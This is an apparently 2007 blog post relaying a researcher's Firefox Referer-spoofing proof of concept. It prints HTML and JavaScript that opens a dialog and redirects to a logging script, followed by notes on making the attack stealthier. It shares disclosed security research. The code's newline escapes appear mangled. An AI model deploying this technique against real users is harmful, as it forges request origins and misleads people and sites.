FREE THOUGHT · FREE SOFTWARE · FREE WORLD

Home  »  Javascript  »  Referer Spoofing Using JavaScript

by comment

Just read an interesting article on the awesome pseudo-flaw.net that you might enjoy. Even though at the moment I'm more into AJAX and simple behavioural unobtrusive javascript as opposed to java, I still remember how excited I was back in 1995 when Sun released both beta and alpha Java versions to the public.. In fact I still have my Java 1.0 Unleashed book, which I'm looking at right now.

Javascript is such a fun language to play with and experiment with, I just don't see the value in hacking javascript to do blackhat stuff.. I really don't see the value in doing any blackhat stuff for the simple reason that its not worth the risk. I really admire the hackers who freely give their time, energy, and expertise to improve the security of free software such as Mozilla Firefox.. it's fun to see what other people are discovering.. Check it.

pseudo-flaw.net


Proof Of Exploit Code

<html>
  <head><meta http-equiv="Refresh" content="1;url=http://www.askapache.com/">
  </head>
  <body>
    <script defer="1">
      setTimeout(function() {
      // from The Jungle Book, by Rudyard Kipling
      var text = "";
      text += "At the hole where he went inn";
      text += "Red-Eye called to Wrinkle-Skin.n";
      text += "Hear what little Red-Eye saith:n";
      text += ""Nag, come up and dance with death!"n";
      text += "n";
      text += "Eye to eye and head to head,n";
      text += "   (Keep the measure, Nag.)n";
      text += "This shall end when one is dead;n";
      text += "   (At thy pleasure, Nag.)n";
      text += "Turn for turn and twist for twist-n";
      text += "   (Run and hide thee, Nag.)n";
      text += "Hah!  The hooded Death has missed!n";
      text += "   (Woe betide thee, Nag!)n";
      prompt(text);
      var t=new image();
      t.src='http://topsites.blogflux.com/track_96716..gif';
      location="http://pseudo-flaw.net/firefox-referer-spoofing/log-request-info.cgi?title=Request+Info:+Quickly";
      }, 900);
      </script>
    </body>
</html>

Notes

  • Only the GET request method seems to be affected. There does not appear to be any mechanism to submit POST data.
  • If the user's browser is configured to not submit Referer information (e.g., network.http.sendRefererHeader=0), these attacks obviously do nothing.
  • The attack will fail if the user forcibly kills the browser, turns off her machine or severs her Internet connection before dismissing the dialog box.
  • The examples use dynamically generated iframe for demonstration purposes. These attacks work equally as well for static pages or top level content (e.g., sample using meta refresh [source]). Unfortunately, it is not as stealthy.
  • The meta refresh approach is most desirable, because the initial request is submitted without any referer information making the attack more difficult to detect.
  • These examples use intentionally goofy text. A real attack would use more appropriate text.
  • Invoking the "Joke Method" twice in a row crashes MineField/3.0a9pre.

Tags

November 27th, 2007

Comments Welcome

Popular Articles
My Online Tools

Related Articles
Newest Posts
Twitter


  • @askapache · Jul 21
    Magic spells for sending thoughts across time? Books
  • @askapache · Jul 20
    TV is just a relic of the previous generation. We just don't know it yet.
  • @askapache · Jul 20
    I will never go back on my ideals, no matter the cost. I'll never let the economic vultures steal my dreams. I'd rather give up the ghost
  • @askapache · Jul 18
    I don't want a better seat, I want control of the engine
  • @askapache · Jul 14
    No matter how good u r, there will always be someone 2x, 5x, 100x better. This is true for me and everyone. No direction but forward.
  • @askapache · Jul 12
    Heads up, I'll DDoS the f out of askapache next week, to see how resilient it really is :) - will try to overflow disk, net, and ip stack
  • RUN GCC! This is a typical shirt I wear, from the  t.co/46LYbFr4k2  shop. A clerk at the LQ recognized it!  t.co/jjmT0dkCPu 
  • Merlin the Magician  t.co/iMmRbanUi4 
  • ROGUE CODE - Latest novel from @markrussinovich  t.co/apkn0LoPIt 
  • RTFM - surprisingly very helpful and way more comprehensive than it looks! @redteamfieldman #pwnAllTheThings  t.co/xiaJ5g0aC9 
  • Dear Hacker - Letters to the Editor of 2600, from Emmanuel Goldstein  t.co/JCfLab7FAJ 
  • The Mythical Man-Month - Essays on Software Engineering, by Frederick P. Brooks, Jr.  t.co/ilWN5GHElr 
  • "where wizards stay up late" - The Origins of the Internet. Favorite book detailing the birth of the net and IMPs  t.co/gY9VTGJgZz 
  • ZERO DAY - read before Trojan horse  t.co/pPMLGDJv8P 
  • Trojan Horse, a novel!  t.co/Hf8EtYaZVa 
  • The Hacker Playbook - very nice high level overview of attacks  t.co/lHwNVWi61u 
  • Clean Code - A Handbook of Agile Software Craftsmanship  t.co/hnJX0x1qIc 
  • Secrets of the JavaScript Ninja - By my absolute favorite JS hacker John Resig!  t.co/tZ42ljmcCl 
  • Hacking Exposed 7: Network Security Secrets & SolutionsMy all time favorite, basic but thorough and accurate.  t.co/jycW0RDVtZ 
  • Empty words will be no surrogate for cold resolve. Pain is nothing.  t.co/qXjpRxbjCw 

Hacking and Hackers

The use of "hacker" to mean "security breaker" is a confusion on the part of the mass media. We hackers refuse to recognize that meaning, and continue using the word to mean someone who loves to program, someone who enjoys playful cleverness, or the combination of the two. See my article, On Hacking.
-- Richard M. Stallman






[hide]

It's very simple - you read the protocol and write the code. -Bill Joy

Except where otherwise noted, content on this site is licensed under a Creative Commons Attribution 3.0 License, just credit with a link.
This site is not supported or endorsed by The Apache Software Foundation (ASF). All software and documentation produced by The ASF is licensed. "Apache" is a trademark of The ASF. NCSA HTTPd.
UNIX ® is a registered Trademark of The Open Group. POSIX ® is a registered Trademark of The IEEE.

| Google+ | askapache

Site Map | Contact Webmaster | License and Disclaimer | Terms of Service

↑ TOPMain